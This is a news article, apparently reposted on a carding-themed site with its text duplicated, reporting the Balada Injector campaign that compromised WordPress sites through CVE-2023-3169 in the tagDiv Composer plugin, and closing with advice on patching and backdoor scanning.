Carding 4 Carders
Professional
Even premium themes can sometimes bring unpleasant surprises to site owners.
The ongoing Balada Injector malware injection operation has infected more than 17,000 WordPress sites, exploiting known vulnerabilities in paid plugins with design themes.
A study conducted by Dr. Web in December 2022, revealed the activities of a malicious campaign that exploited WordPress vulnerabilities to implement this Linux backdoor. Infected sites redirected users to fake technical support pages, fraudulent sweepstakes, and win notifications.
Sucuri reported in April 2023 that Balada Injector has been active since at least 2017, and the total number of compromised sites for all time has long exceeded one million .
In one of the latest malware campaigns, attackers exploited a cross-site scripting (XSS) vulnerability with the identifier CVE-2023-3169 in the tagDiv Composer tool, designed to use popular Newspaper and Newsmag design themes. Infections began in mid-September, shortly after the vulnerability was disclosed and the PoC exploit was publicly released.
According to public statistics from EnvatoMarket, Newspaper has about 137,000 sales, and Newsmag has more than 18,500, so the total attack surface is 155,500 sites, not counting pirated copies. These premium themes are often used by thriving online platforms that collect significant traffic.
A tagDiv representative confirmed that they are aware of the issue: "We are aware of such cases. Malware can affect sites that use older versions of themes." He also recommended updating the used instances of Newspaper or Newsmag, as well as installing a security plugin such as Wordfence.
Sucuri in a recent report notes that in September alone, more than 17 thousand websites were compromised using various variations of Balada Injector, more than 9,000 of which are related to the CVE-2023-3169 vulnerability. A characteristic feature of its operation is a malicious script embedded in certain tags of the site's database.
Sucuri recently recorded 6 different attacks, each of which had its own characteristics. For example, in one of the methods, hackers introduced a backdoor directly into the page 404.php, indicating that the specified site resource was not found.
To protect against Balada Injector, we recommend updating the tagDiv Composer plugin to version 4.2, which fixes the aforementioned vulnerability, or later. You should also regularly update all themes and plugins, delete inactive user accounts, and scan site files for hidden backdoors.
The ongoing Balada Injector malware injection operation has infected more than 17,000 WordPress sites, exploiting known vulnerabilities in paid plugins with design themes.
A study conducted by Dr. Web in December 2022, revealed the activities of a malicious campaign that exploited WordPress vulnerabilities to implement this Linux backdoor. Infected sites redirected users to fake technical support pages, fraudulent sweepstakes, and win notifications.
Sucuri reported in April 2023 that Balada Injector has been active since at least 2017, and the total number of compromised sites for all time has long exceeded one million .
In one of the latest malware campaigns, attackers exploited a cross-site scripting (XSS) vulnerability with the identifier CVE-2023-3169 in the tagDiv Composer tool, designed to use popular Newspaper and Newsmag design themes. Infections began in mid-September, shortly after the vulnerability was disclosed and the PoC exploit was publicly released.
According to public statistics from EnvatoMarket, Newspaper has about 137,000 sales, and Newsmag has more than 18,500, so the total attack surface is 155,500 sites, not counting pirated copies. These premium themes are often used by thriving online platforms that collect significant traffic.
A tagDiv representative confirmed that they are aware of the issue: "We are aware of such cases. Malware can affect sites that use older versions of themes." He also recommended updating the used instances of Newspaper or Newsmag, as well as installing a security plugin such as Wordfence.
Sucuri in a recent report notes that in September alone, more than 17 thousand websites were compromised using various variations of Balada Injector, more than 9,000 of which are related to the CVE-2023-3169 vulnerability. A characteristic feature of its operation is a malicious script embedded in certain tags of the site's database.
Sucuri recently recorded 6 different attacks, each of which had its own characteristics. For example, in one of the methods, hackers introduced a backdoor directly into the page 404.php, indicating that the specified site resource was not found.
To protect against Balada Injector, we recommend updating the tagDiv Composer plugin to version 4.2, which fixes the aforementioned vulnerability, or later. You should also regularly update all themes and plugins, delete inactive user accounts, and scan site files for hidden backdoors.
